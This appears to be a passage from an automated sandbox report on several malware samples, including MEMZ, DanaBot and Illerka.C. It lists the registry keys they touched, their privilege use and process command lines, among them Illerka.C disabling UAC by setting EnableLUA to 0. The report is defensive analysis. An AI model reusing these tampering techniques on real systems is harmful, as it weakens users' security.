| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Pikachu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\PCToaster.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\DanaBot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Prolin (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Prolin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\ClassicShell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\ClassicShell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\ClassicShell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\ArcticBomb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\FlashKiller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Prolin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Trood.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Alerta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Prolin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Quamo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\PCToaster.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gas.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\ActiveTitle = "173 32 128" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\MenuText = "104 107 149" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\ButtonFace = "240 1 182" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\InactiveTitleText = "7 174 182" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\InactiveBorder = "21 209 81" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\ButtonText = "6 71 65" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\ActiveBorder = "252 218 77" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\Scrollbar = "162 217 212" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\InactiveTitle = "208 154 149" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\Menu = "235 188 112" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\WindowFrame = "193 35 39" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\HilightText = "131 19 191" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\ButtonShadow = "185 33 60" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\Window = "33 193 165" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\WindowText = "214 169 103" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\AppWorkspace = "187 90 123" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\Hilight = "1 49 223" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\GrayText = "254 148 202" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\TitleText = "184 241 25" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Colors\Background = "140 81 111" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133896755625355476" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{C2ADAAD4-D5E2-45ED-9297-4B5DE03F46E2} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\6548553-Melissa-Virus-MR73006.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2ec,0x7ffe5aa6f208,0x7ffe5aa6f214,0x7ffe5aa6f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2348,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2576,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=2656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=3808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3484,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5556,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5560 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5696,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5588 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5696,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5588 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6020,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5844,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6776,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6740,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6656,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7148,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7088,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7592,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7160 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7600,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7608,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7128,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6340,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=5788,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7960,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:1
